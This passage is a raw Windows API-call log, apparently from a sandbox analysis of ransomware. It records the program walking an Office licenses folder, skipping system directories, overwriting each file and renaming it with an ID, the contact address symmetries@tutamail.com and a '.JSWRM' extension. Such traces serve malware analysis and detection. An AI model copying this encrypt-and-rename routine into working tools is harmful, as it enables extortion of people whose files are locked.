[0104.891] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f4d0 | out: hHeap=0x1e0000) returned 1 [0104.891] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2368b8 | out: hHeap=0x1e0000) returned 1 [0104.891] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236520 | out: hHeap=0x1e0000) returned 1 [0104.891] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0104.891] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0104.891] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe5cc5650, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe5cc5650, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe5daa4c9, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2bab, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="O365HomePremR_SubTest5-pl.xrm-ms", cAlternateFileName="O37513~1.XRM")) returned 1 [0104.891] lstrcmpiW (lpString1="O365HomePremR_SubTest5-pl.xrm-ms", lpString2=".") returned 1 [0104.891] lstrcmpiW (lpString1="O365HomePremR_SubTest5-pl.xrm-ms", lpString2="..") returned 1 [0104.891] lstrcmpiW (lpString1="O365HomePremR_SubTest5-pl.xrm-ms", lpString2="...") returned 1 [0104.891] lstrcmpiW (lpString1="O365HomePremR_SubTest5-pl.xrm-ms", lpString2="windows") returned -1 [0104.892] lstrcmpiW (lpString1="O365HomePremR_SubTest5-pl.xrm-ms", lpString2="recovery") returned -1 [0104.892] lstrcmpiW (lpString1="O365HomePremR_SubTest5-pl.xrm-ms", lpString2="perflogs") returned -1 [0104.894] lstrcmpiW (lpString1="O365HomePremR_SubTest5-pl.xrm-ms", lpString2="documents and settings") returned 1 [0104.894] lstrcmpiW (lpString1="O365HomePremR_SubTest5-pl.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0104.894] lstrcmpiW (lpString1="O365HomePremR_SubTest5-pl.xrm-ms", lpString2="system volume information") returned -1 [0104.894] lstrcmpiW (lpString1="O365HomePremR_SubTest5-pl.xrm-ms", lpString2="msocache") returned 1 [0104.894] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bd50 [0104.894] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365HomePremR_SubTest5-pl.xrm-ms", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0104.894] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0104.894] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365HomePremR_SubTest5-pl.xrm-ms", cchWideChar=32, lpMultiByteStr=0x22d0a0, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365HomePremR_SubTest5-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 32 [0104.894] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bd50 | out: hHeap=0x1e0000) returned 1 [0104.894] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c118 [0104.894] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365HomePremR_SubTest5-pl.xrm-ms", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0104.894] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0104.894] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365HomePremR_SubTest5-pl.xrm-ms", cchWideChar=32, lpMultiByteStr=0x22d298, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365HomePremR_SubTest5-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 32 [0104.894] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c118 | out: hHeap=0x1e0000) returned 1 [0104.894] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236748 [0104.894] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236188 | out: hHeap=0x1e0000) returned 1 [0104.895] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0104.895] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0104.895] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235df0 [0104.895] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365HomePremR_SubTest5-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365homepremr_subtest5-pl.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0104.895] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11179) returned 1 [0104.895] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0104.895] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2ba0) returned 0x24c1d0 [0104.895] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2ba0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2ba0, lpOverlapped=0x0) returned 1 [0104.898] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0104.898] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2ba0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2ba0, lpOverlapped=0x0) returned 1 [0104.898] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0104.898] CloseHandle (hObject=0x45c) returned 1 [0104.898] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235c80 [0104.898] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0104.898] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0104.898] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0d8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0104.898] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0104.898] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0104.898] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0104.898] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a288 [0104.899] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a288, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0104.899] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a288 | out: hHeap=0x1e0000) returned 1 [0104.899] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236690 [0104.899] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e688 [0104.899] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236690 | out: hHeap=0x1e0000) returned 1 [0104.899] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0104.899] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365HomePremR_SubTest5-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365homepremr_subtest5-pl.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365HomePremR_SubTest5-pl.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365homepremr_subtest5-pl.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0104.899] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e688 | out: hHeap=0x1e0000) returned 1 [0104.899] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235c80 | out: hHeap=0x1e0000) returned 1 [0104.899] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235df0 | out: hHeap=0x1e0000) returned 1 [0104.900] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0104.900] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0104.900] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe5dd0763, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe5dd0763, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe5fc05cc, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x5a5e, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="O365HomePremR_SubTest5-ppd.xrm-ms", cAlternateFileName="O369C8~1.XRM")) returned 1 [0104.900] lstrcmpiW (lpString1="O365HomePremR_SubTest5-ppd.xrm-ms", lpString2=".") returned 1 [0104.900] lstrcmpiW (lpString1="O365HomePremR_SubTest5-ppd.xrm-ms", lpString2="..") returned 1 [0104.900] lstrcmpiW (lpString1="O365HomePremR_SubTest5-ppd.xrm-ms", lpString2="...") returned 1 [0104.900] lstrcmpiW (lpString1="O365HomePremR_SubTest5-ppd.xrm-ms", lpString2="windows") returned -1 [0104.900] lstrcmpiW (lpString1="O365HomePremR_SubTest5-ppd.xrm-ms", lpString2="recovery") returned -1 [0104.900] lstrcmpiW (lpString1="O365HomePremR_SubTest5-ppd.xrm-ms", lpString2="perflogs") returned -1 [0104.900] lstrcmpiW (lpString1="O365HomePremR_SubTest5-ppd.xrm-ms", lpString2="documents and settings") returned 1 [0104.900] lstrcmpiW (lpString1="O365HomePremR_SubTest5-ppd.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0104.900] lstrcmpiW (lpString1="O365HomePremR_SubTest5-ppd.xrm-ms", lpString2="system volume information") returned -1 [0104.900] lstrcmpiW (lpString1="O365HomePremR_SubTest5-ppd.xrm-ms", lpString2="msocache") returned 1 [0104.900] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c5e8 [0104.900] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365HomePremR_SubTest5-ppd.xrm-ms", cchWideChar=33, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 33 [0104.900] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0104.900] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365HomePremR_SubTest5-ppd.xrm-ms", cchWideChar=33, lpMultiByteStr=0x22cdc8, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365HomePremR_SubTest5-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 33 [0104.900] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c5e8 | out: hHeap=0x1e0000) returned 1 [0104.900] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c5e8 [0104.900] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365HomePremR_SubTest5-ppd.xrm-ms", cchWideChar=33, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 33 [0104.900] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0104.900] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365HomePremR_SubTest5-ppd.xrm-ms", cchWideChar=33, lpMultiByteStr=0x22ce70, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365HomePremR_SubTest5-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 33 [0104.900] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c5e8 | out: hHeap=0x1e0000) returned 1 [0104.900] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2362f8 [0104.900] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236748 | out: hHeap=0x1e0000) returned 1 [0104.900] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0104.900] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0104.900] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236748 [0104.900] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365HomePremR_SubTest5-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365homepremr_subtest5-ppd.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0104.901] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=23134) returned 1 [0104.901] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0104.901] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x5a50) returned 0x24c1d0 [0104.901] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x5a50, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x5a50, lpOverlapped=0x0) returned 1 [0104.904] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0104.904] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x5a50, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x5a50, lpOverlapped=0x0) returned 1 [0104.904] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0104.904] CloseHandle (hObject=0x45c) returned 1 [0104.904] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236240 [0104.904] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0104.904] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0104.904] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0104.904] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0104.904] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0104.904] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0104.904] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a348 [0104.904] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a348, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0104.904] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a348 | out: hHeap=0x1e0000) returned 1 [0104.904] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b2b8 [0104.904] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f158 [0104.904] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b2b8 | out: hHeap=0x1e0000) returned 1 [0104.904] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0104.905] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365HomePremR_SubTest5-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365homepremr_subtest5-ppd.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365HomePremR_SubTest5-ppd.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365homepremr_subtest5-ppd.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0104.905] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f158 | out: hHeap=0x1e0000) returned 1 [0104.905] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236240 | out: hHeap=0x1e0000) returned 1 [0104.905] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236748 | out: hHeap=0x1e0000) returned 1 [0104.905] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0104.906] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0104.906] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe5d37d8b, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe5d37d8b, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe5e1cbb7, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2d6e, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="O365HomePremR_SubTest5-ul-oob.xrm-ms", cAlternateFileName="O3A74B~1.XRM")) returned 1 [0104.906] lstrcmpiW (lpString1="O365HomePremR_SubTest5-ul-oob.xrm-ms", lpString2=".") returned 1 [0104.906] lstrcmpiW (lpString1="O365HomePremR_SubTest5-ul-oob.xrm-ms", lpString2="..") returned 1 [0104.906] lstrcmpiW (lpString1="O365HomePremR_SubTest5-ul-oob.xrm-ms", lpString2="...") returned 1 [0104.906] lstrcmpiW (lpString1="O365HomePremR_SubTest5-ul-oob.xrm-ms", lpString2="windows") returned -1 [0104.906] lstrcmpiW (lpString1="O365HomePremR_SubTest5-ul-oob.xrm-ms", lpString2="recovery") returned -1 [0104.906] lstrcmpiW (lpString1="O365HomePremR_SubTest5-ul-oob.xrm-ms", lpString2="perflogs") returned -1 [0104.906] lstrcmpiW (lpString1="O365HomePremR_SubTest5-ul-oob.xrm-ms", lpString2="documents and settings") returned 1 [0104.906] lstrcmpiW (lpString1="O365HomePremR_SubTest5-ul-oob.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0104.906] lstrcmpiW (lpString1="O365HomePremR_SubTest5-ul-oob.xrm-ms", lpString2="system volume information") returned -1 [0104.906] lstrcmpiW (lpString1="O365HomePremR_SubTest5-ul-oob.xrm-ms", lpString2="msocache") returned 1 [0104.906] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c5e8 [0104.906] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365HomePremR_SubTest5-ul-oob.xrm-ms", cchWideChar=36, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0104.906] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0104.906] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365HomePremR_SubTest5-ul-oob.xrm-ms", cchWideChar=36, lpMultiByteStr=0x22d298, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365HomePremR_SubTest5-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 36 [0104.906] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c5e8 | out: hHeap=0x1e0000) returned 1 [0104.906] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c328 [0104.906] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365HomePremR_SubTest5-ul-oob.xrm-ms", cchWideChar=36, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0104.906] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0104.906] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365HomePremR_SubTest5-ul-oob.xrm-ms", cchWideChar=36, lpMultiByteStr=0x22cdc8, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365HomePremR_SubTest5-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 36 [0104.906] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c328 | out: hHeap=0x1e0000) returned 1 [0104.906] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235c80 [0104.906] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2362f8 | out: hHeap=0x1e0000) returned 1 [0104.906] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0104.906] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0104.906] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236800 [0104.906] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365HomePremR_SubTest5-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365homepremr_subtest5-ul-oob.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0104.907] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11630) returned 1 [0104.907] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0104.907] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2d60) returned 0x24c1d0 [0104.907] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2d60, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2d60, lpOverlapped=0x0) returned 1 [0104.909] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0104.909] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2d60, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2d60, lpOverlapped=0x0) returned 1 [0104.909] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0104.909] CloseHandle (hObject=0x45c) returned 1 [0104.909] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235ea8 [0104.909] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0104.909] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0104.909] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0104.910] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0104.910] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0104.910] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0104.910] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a360 [0104.910] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a360, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0104.910] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, 